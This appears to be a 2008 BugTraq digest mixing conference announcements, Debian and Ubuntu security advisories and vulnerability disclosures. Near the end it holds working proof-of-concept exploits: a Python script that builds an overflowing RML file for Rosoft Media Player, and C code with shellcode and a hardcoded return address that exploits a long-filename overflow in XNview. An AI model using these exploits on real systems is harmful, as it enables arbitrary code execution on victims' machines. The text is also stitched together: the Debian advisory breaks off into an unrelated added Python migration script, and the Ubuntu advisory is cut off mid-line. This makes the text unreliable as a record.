Black Hat Announcements: New CFP system and Japan '08 confirmed
BugTraq readers, here is a big Black Hat update to keep inquiring minds up to date with all the goings on in our not-so-secret lair:

Black Hat Amsterdam is a go!

Training: 25-26 March 2008
Briefings: 27-28 March 2008

There will be four different tracks over two days comprised of over 20+ internationally renowned security professionals speaking on diverse topics from intercepting GSM traffic and the evolution of spam techniques to attacking Anti Virus products and new client side channels:
https://www.blackhat.com/html/bh-europe-08/bh-eu-08-main.html

Black Hat USA News:

We're very proud to announce a new feature for paid Black Hat attendees starting with the USA show in August - delegate access to our CFP system! Paid delegates can now log into our CFP database, read and review our proposed presentations and share their ratings and comments with Black Hat. Your ratings will help us create the show you want to attend, and even help focus presentations as they're being created. We are excited to see what kind of information we learn about what interests our delegates and what kind of talks meet their needs best. We've always said that our delegates make Black Hat the experience it is, and we're glad to have the opportunity to extend their influence on the final product.

To read more about this new opportunity, go to:
https://www.blackhat.com/html/blackpages/blackpages.html

We're also unveiling an Un-Track where attendees create their own mash-up style presentations - so if you've got something to share with the security community, this is your moment.

Continuing a popular new BH development, we will also have speaker QA rooms after every presentation to help you follow up with your speaker and network with like-minded delegates. Still have a question that didn't quite get answered? Follow your speaker and continue the conversation.

Registration is now OPEN for The Black Hat Briefings USA, register now to take advantage of our early bird rates:

Black Hat Briefings USA 2008, August 2-7 at the Caesars Palace Las Vegas
Early registration rate closes May 1, 2008.
Regular registration rate closes July 1, 2008.
https://www.blackhat.com/html/bh-registration/bh-registration.html#USA

The Black Hat USA Call for Papers is now open. For descriptions of the tracks and deadlines check out:
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-cfp.html

To create or update a submission:
https://cfp.blackhat.com/

Download all the Black Hat USA 2007 content for free in an iPod friendly format! For audio and video follow these links:
https://www.blackhat.com/podcast/bh-usa-07-video.rss
https://www.blackhat.com/podcast/bh-usa-07-audio.rss

Black Hat Japan News:

We're happy to announce that Black Hat is returning to Tokyo for another Black Hat Japan in October 2008. We'll be bringing another strong lineup of speakers and trainers and the best lineup of technical security presentations available in Japan. We hope to see you there!

About Black Hat

The Black Hat Briefings are a series of highly technical information security conferences that bring together thought leaders from all facets of the infosec world - from the corporate and government sectors to academic and even underground researchers. The environment is strictly vendor-neutral and focused on the sharing of practical insights and timely, actionable knowledge. Black Hat remains the best and biggest event of its kind, unique in its ability to define tomorrow's information security landscape. 15 years at the intersection of network security and hacker ingenuity is what makes Black Hat the one-of-a-kind conference it is, one where the establishment and the underground are equally at home.

In addition to the large number of short, topical presentations in the Briefings, Black Hat also provides hands-on, high-intensity, multi-day Trainings. The Training sessions are provided by some of the most respected experts in the world and many also provide formal certifications to qualifying attendees. Arrangements can also be made to bring Black Hat's trainers to your location for private and customized training.

Subscribe to the Black Hat RSS feed to keep up to date on news, announcements, and content:
https://www.blackhat.com/BlackHatRSS.xml

UNSUBSCRIBE: These announcements get sent to past Black Hat attendees. If you wish to stop receiving them just reply saying so and I'll remove you from the list.

Jeff Moss
Director
Black Hat
Local persistent DoS in Windows XP SP2 Taskmgr
Dear list,

after weeks of total ignorance by Microsoft I decided to finally release all information related to a bug that has to do with the Windows XP SP2 Taskmanager. Manipulating a Registry key makes it possible to disable the Taskmgr. On the next startup it will crash with an error message. It is possible to backup the key and repair the Registry doing so, but the attack scenario is clear: a virus uses this code, the user can't open the Taskmgr anymore and your process is somehow hidden.

The full information about this bug can be found here:
http://core-security.net/archive/2008/march/index.php#14032008

And the exploit is available here:
http://core-security.net/releases/exploits/taskmgr_dos.c.txt

Greets,
SkyOut

--- core-security.net ---
[SECURITY] [DSA 1516-1] New dovecot packages fix privilege escalation
------------------------------------------------------------------------
Debian Security Advisory DSA-1516-1                    [EMAIL PROTECTED]
http://www.debian.org/security/                           Florian Weimer
March 14, 2008                        http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : dovecot
Vulnerability  : privilege escalation
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2008-1199 CVE-2008-1218
Debian Bug     : 469457

Prior to this update, the default configuration for Dovecot used by Debian runs the server daemons with group mail privileges. This means that users with write access to their mail directory by other means (for example, through an SSH login) could read mailboxes owned by other users for which they do not have direct write access (CVE-2008-1199). In addition, an internal interpretation conflict in password handling has been addressed proactively, even though it is not known to be exploitable (CVE-2008-1218).

Note that applying this update requires manual action: The configuration setting mail_extra_groups = mail has been replaced with mail_privileged_group = mail. The update will show a configuration file conflict in /etc/dovecot/dovecot.conf. It is recommended that you keep the currently installed configuration file, and change the affected line. For your reference, the sample configuration (without your local changes) will have been written to /etc/dovecot/dovecot.conf.dpkg-new. If your current configuration uses mail_extra_groups with a value different from mail, you may have to resort to the mail_access_groups configuration directive.

For the stable distribution (etch), these problems have been fixed in version 1.0.rc15-2etch4.

For the unstable distribution (sid), these problems have been fixed in version 1.0.13-1.

For the old stable distribution (sarge), no updates are provided. We recommend that you consider upgrading to the stable distribution.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15-2etch4.dsc
    Size/MD5 checksum:     1300 8146ccf246ed64e1ac8c0127489ec798
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15.orig.tar.gz
    Size/MD5 checksum:  1463069 26f3d2b075856b1b1d180146363819e6
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15-2etch4.diff.gz
    Size/MD5 checksum:   102991 21959fc45cf0f8932fa9eb890791ff39

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_alpha.deb
    Size/MD5 checksum:   583482 a0d18885da096140ceb4110d525569d4
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_alpha.deb
    Size/MD5 checksum:  1379844 6103bce830848d3f9bb4347f5c9b94f0
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_alpha.deb
    Size/MD5 checksum:   621320 48127903af1fe2130cb84c57e5a607ff

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_amd64.deb
    Size/MD5 checksum:  1222430 1c2e1ffeb6bf745ed88cde01c62d264a
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_amd64.deb
    Size/MD5 checksum:   536634 4f64ed0cc16510e9c3d709342b3c57ca
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_amd64.deb
    Size/MD5 checksum:   569588 c17bac715f188f55ae20e5a3c95109b1

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_arm.deb
    Size/MD5 checksum:  1123030 47eb9fddcc68c2c213afa10c8e3d8747
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_arm.deb
    Size/MD5 checksum:   506134 0f4d939f2cf68f4e5b01140c846e50bc
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_arm.deb
    Size/MD5 checksum:   537564 82310ae4e42406429f8ade7cbb81abf0

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_hppa.deb
    Size/MD5 checksum:  1298818 603d12284115b6349e1d0334263d2af0
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_hppa.deb
    Size/MD5 checksum:   562192 413ac964849698428c1b08e9cc9075bc
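The manual step the advisory asks for (turning mail_extra_groups = mail into mail_privileged_group = mail, and falling back to mail_access_groups when the old directive carried some other group list) is mechanical enough to script, and scripting it avoids the usual mistake of leaving the daemons in group mail. The Python below is an added example, not Debian's or Dovecot's own tooling. It assumes the plain "key = value" line format of dovecot.conf, leaves commented-out lines alone, and reports every line it rewrote so the administrator can review the result against dovecot.conf.dpkg-new before restarting Dovecot; the sample configuration embedded in it is constructed, not an excerpt of any real file.

```python
#!/usr/bin/env python3
"""Rewrite the deprecated mail_extra_groups directive in a dovecot.conf.

Added example for DSA-1516-1; not Debian's or Dovecot's own tooling.
Assumes the plain "key = value" line format of dovecot.conf.
"""
import re
import sys

# One directive line: optional indent, the legacy key, its value (up to the
# first whitespace or '#'), and whatever follows (trailing comment, spaces).
# A line starting with '#' never matches, so commented-out copies are kept.
_LEGACY = re.compile(r"^(\s*)mail_extra_groups\s*=\s*([^#\s]*)(.*)$")


def migrate_line(line):
    """Return (rewritten_line, note); note is None if the line is untouched."""
    m = _LEGACY.match(line)
    if m is None:
        return line, None
    indent, value, rest = m.groups()
    if value == "mail":
        # The case the advisory describes: group mail becomes the privileged group.
        return f"{indent}mail_privileged_group = mail{rest}", "renamed to mail_privileged_group"
    if value == "":
        # An empty group list grants nothing extra; there is nothing to migrate.
        return line, "empty mail_extra_groups left unchanged"
    # Any other group list is the case the advisory routes to mail_access_groups.
    return (f"{indent}mail_access_groups = {value}{rest}",
            f"group list {value!r} is not 'mail'; moved to mail_access_groups, review manually")


def migrate_config(text):
    """Migrate a whole config; returns (new_text, [(line_no, note), ...])."""
    out, notes = [], []
    for n, line in enumerate(text.splitlines(), start=1):
        new, note = migrate_line(line)
        out.append(new)
        if note is not None:
            notes.append((n, note))
    new_text = "\n".join(out)
    if text.endswith("\n"):
        new_text += "\n"
    return new_text, notes


# Constructed sample config, not an excerpt from any real /etc/dovecot/dovecot.conf.
SAMPLE_CONF = """\
protocols = imap pop3
#mail_extra_groups = mail
mail_extra_groups = mail   # Debian default before DSA-1516-1
mail_location = maildir:~/Maildir
"""

if __name__ == "__main__":
    # Usage: migrate_dovecot.py [dovecot.conf]; with no argument the sample is used.
    # The migrated config goes to stdout, the per-line notes to stderr.
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CONF
    new_text, notes = migrate_config(src)
    sys.stdout.write(new_text)
    for line_no, note in notes:
        sys.stderr.write(f"line {line_no}: {note}\n")
```

Run it against a copy of the installed file and diff the output rather than writing over /etc/dovecot/dovecot.conf in place; the notes on stderr flag exactly the lines where a non-default group list was moved to mail_access_groups, which is the case the advisory says needs a human decision.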
Troopers08 Security Conference, April 23/24 (Munich/Germany)
Troopers08 Presentations

Keynote on Invulnerable Software - Dan Bernstein
KIDS - Kernel Intrusion Detection System - Rodrigo Branco
State of Security - Andrew Cushman, Microsoft
Release of the next revision of the free Exploit-Me series of application penetration testing tools - Nish Bhalla, Security Compass
Side Channel Analysis - Job de Haas, Riscure
Hackertools according to German law (§ 202c StGB) - Horst Speichert, Lawyer
Hardening Oracle in Corporate Environments - Alexander Kornbrust, Red-Database-Security
Virtualization: There is no spoon - Michael Kemp
Straight Talk about Cryptography - Jon Callas, PGP
Evilgrade: You have pending upgrades - Francisco Amato
Self defending networks - hype or essential need for international organisations? - Rolf Strehle, VOITH AG
Keynote Virtualization: Floor Wax, Dessert Topping and The End of Information Security As We Know It? - Christopher Hoff, Unisys
GPUs, password recovery and thunder tables - Andrey Belenko, ElcomSoft
Incident Management - tasks and organization. - Volker Kozok, German Ministry of Defense
A penetration testing learning kit - Ariel Waissbein, Core Security
Organizing and analyzing logdata with entropy - Sergey Bratus, Dartmouth College
Hacking Second Life(TM) - Michael Thumann, ERNW GmbH
Enterprise Webapplication Security [EMAIL PROTECTED] S.E., Dr. Johannes Raab Thomas Stocker, Allianz S.E.
Tapping $$$ Enterprises - Pierre Kroma
Virtual Honey Pots - Thorsten Holz, Universitaet Mannheim
SCADA and National Critical Infrastructures: is security an optional? - Raoul Chiesa
Data Loss Protection - Hope or Hype. - Enno Rey, Angus Blitter

--

Additional Pre-Con Latenight Talks
PacketWars Evening Fun

thanks,

--
Enno Rey
ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 173 6745902
PGP FP 055F B3F3 FE9D 71DD C0D5 444E C611 033E 3296 1CC1
Handelsregister Heidelberg: HRB 7135
Geschaeftsfuehrer: Roland Fiege, Enno Rey
[USN-586-1] mailman vulnerability
===========================================================
Ubuntu Security Notice USN-586-1             March 15, 2008
mailman vulnerability
CVE-2008-0564
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  mailman                         2.1.5-9ubuntu4.2

Ubuntu 6.10:
  mailman                         1:2.1.8-2ubuntu2.1

Ubuntu 7.04:
  mailman                         1:2.1.9-4ubuntu1.2

Ubuntu 7.10:
  mailman                         1:2.1.9-8ubuntu0.2

In general, a standard system upgrade is sufficient to effect the necessary changes.

NOTE: Due to an internal release testing mistake, earlier published mailman versions 1:2.1.9-4ubuntu1.1 (for Ubuntu 7.04) and 1:2.1.9-8ubuntu0.1 (for Ubuntu 7.10) accidentally included an incorrect patch and caused a regression, as reported in
https://launchpad.net/bugs/202332

This update includes fixes for the problem. We apologize for the inconvenience.

Details follow:

Multiple cross-site scripting flaws were discovered in mailman. A malicious list administrator could exploit this to execute arbitrary JavaScript, potentially stealing user credentials.

Updated packages for Ubuntu 6.06 LTS:

  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2.diff.gz
      Size/MD5:   231090 d3e7124adf9454e2754e41c98df1a79c
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2.dsc
      Size/MD5:      626 0ac6344f31b1fd756ff3c724a059c907
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5.orig.tar.gz
      Size/MD5:  5745912 f5f56f04747cd4aff67427e7a45631af

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2_amd64.deb
      Size/MD5:  6613254 72d9727b248c5e8ac1ffe6699989b546

  i386 architecture (x86 compatible Intel/AMD):
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2_i386.deb
      Size/MD5:  6612872 6fa80a2c5f9fb4ef86fc37f5948eb7ea

  powerpc architecture (Apple Macintosh G3/G4/G5):
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2_powerpc.deb
      Size/MD5:  6621726 45ad75a62c903f80ccaed21d8bff8e0f

  sparc architecture (Sun SPARC/UltraSPARC):
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2_sparc.deb
      Size/MD5:  6620818 7dc3bc18e981e78fa7d9e18bda151ecc

Updated packages for Ubuntu 6.10:

  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1.diff.gz
      Size/MD5:   203009 ee4a019ea676c82f040bad51a13f2a04
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1.dsc
      Size/MD5:      819 53355a3ca08c288d785123da51dbb10e
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8.orig.tar.gz
      Size/MD5:  6856039 b9308ea3ffe8dd447458338408d46bd6

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1_amd64.deb
      Size/MD5:  8017888 34628b56f38515676c840c10f2aa100d

  i386 architecture (x86 compatible Intel/AMD):
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1_i386.deb
      Size/MD5:  8016276 18b60f0774f2f664d5505391834ed0c6

  powerpc architecture (Apple Macintosh G3/G4/G5):
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1_powerpc.deb
      Size/MD5:  8025122 20b2783ab25dd270751211463fdedc77

  sparc architecture (Sun SPARC/UltraSPARC):
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1_sparc.deb
      Size/MD5:  8023672 02dd507266718e196abef08311a995b5

Updated packages for Ubuntu 7.04:

  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9-4ubuntu1.2.diff.gz
      Size/MD5:   142531 2e32aeebcbf3d45e498d4241bf1cf0c8
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9-4ubuntu1.2.dsc
      Size/MD5:      981 0c8c78087bcf0213f17013c94fea9764
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9.orig.tar.gz
      Size/MD5:  7829201 dd51472470f9eafb04f64da372444835

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9-4ubuntu1.2_amd64.deb
      Size/MD5:  8606862 74502c6c9e9a8bb277c6f741abd46541

  i386 architecture (x86 compatible Intel/AMD):
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9-4ubuntu1.2_i386.deb
      Size/MD5:  8605384 46330ecad45d07957ac827e5f8e944e2

  powerpc architecture (Apple
Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow
Description:

This is nothing special - there is just a flaw in Rosoft Media Player 4.1.8, similar to the one discovered by Juan Pablo Lopez Yacubian. This one concerns RML files. This is a Stack Based Buffer Overflow vulnerability - we can overwrite EIP. I hope that it was not reported before.

Author: Wiktor Sierociński

POC:

#!/usr/bin/python
# Builds an RML playlist whose only entry is a 5000-byte line of 'A's;
# loading it in Rosoft Media Player 4.1.8 overflows a stack buffer and
# overwrites EIP, as described above.
content = (
    "#EXTINF:Played=0\n"
    + "A" * 5000
    + "\n"
)
fd = open("music.rml", "w")
fd.write(content)
fd.close()
print "RML FILE CREATED"
XNview 1.92.1 Long Filename Overflow
XNview

Information:

Version : 1.92.1
Website : http://www.xnview.com/
Problem : Long Filename Overflow

Description:

XnView is an efficient multimedia viewer, browser, and converter. It supports more than 400 graphic file formats (PNG, JPEG, TARGA, TIFF, GIF, BMP, and more).

Details:

* The problem is that XNview doesn't handle long file names. It results in an exploitable buffer overflow which allows execution of arbitrary code.

POC:

#include <windows.h>
#include <unistd.h>
#include <string.h>

/*
   Shellcode Size=164 octets
   Action: open calc.exe
*/
unsigned char shellcode[] =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16"
"\x77\x0b\x94\x83\xeb\xfc\xe2\xf4\xea\x9f\x4f\x94\x16\x77\x80\xd1"
"\x2a\xfc\x77\x91\x6e\x76\xe4\x1f\x59\x6f\x80\xcb\x36\x76\xe0\xdd"
"\x9d\x43\x80\x95\xf8\x46\xcb\x0d\xba\xf3\xcb\xe0\x11\xb6\xc1\x99"
"\x17\xb5\xe0\x60\x2d\x23\x2f\x90\x63\x92\x80\xcb\x32\x76\xe0\xf2"
"\x9d\x7b\x40\x1f\x49\x6b\x0a\x7f\x9d\x6b\x80\x95\xfd\xfe\x57\xb0"
"\x12\xb4\x3a\x54\x72\xfc\x4b\xa4\x93\xb7\x73\x98\x9d\x37\x07\x1f"
"\x66\x6b\xa6\x1f\x7e\x7f\xe0\x9d\x9d\xf7\xbb\x94\x16\x77\x80\xfc"
"\x2a\x28\x3a\x62\x76\x21\x82\x6c\x95\xb7\x70\xc4\x7e\x87\x81\x90"
"\x49\x1f\x93\x6a\x9c\x79\x5c\x6b\xf1\x14\x6a\xf8\x75\x59\x6e\xec"
"\x73\x77\x0b\x94";

/* user32.dll ret address == jmp ebp under Win XP pro SP2 */
unsigned char ret[] = "\x34\x59\x40\x7e";

int main(int argc, char *argv[])
{
    char *bufExe[3];
    char buf[511];

    bufExe[0] = "xnview.exe";
    bufExe[2] = NULL;

    /* NOP sled, return address at offset 260, shellcode at offset 330; the
       string literal's terminating NUL (copied with sizeof) ends the argument. */
    memset(buf, 0x90, 511);
    memcpy(&buf[260], ret, 4);
    memcpy(&buf[330], shellcode, sizeof(shellcode));
    bufExe[1] = buf;

    /* Launch xnview.exe with the over-long file name as its only argument. */
    execve(bufExe[0], bufExe, NULL);
    return 0x0;
}

Disclosure Timeline:

04 February 2008 - Discovery
12 February 2008 - Vendor notification
13 February 2008 - Vendor reply
14 March 2008 - Release of XNview 1.93.1
15 March 2008 - Public Disclosure

Credits:

Author : Sylvain THUAL
Original advisory (French) : http://www.click-internet.fr/index.php?cki=Newsnews=9
E-mail : [EMAIL PROTECTED]
Website : http://www.click-internet.fr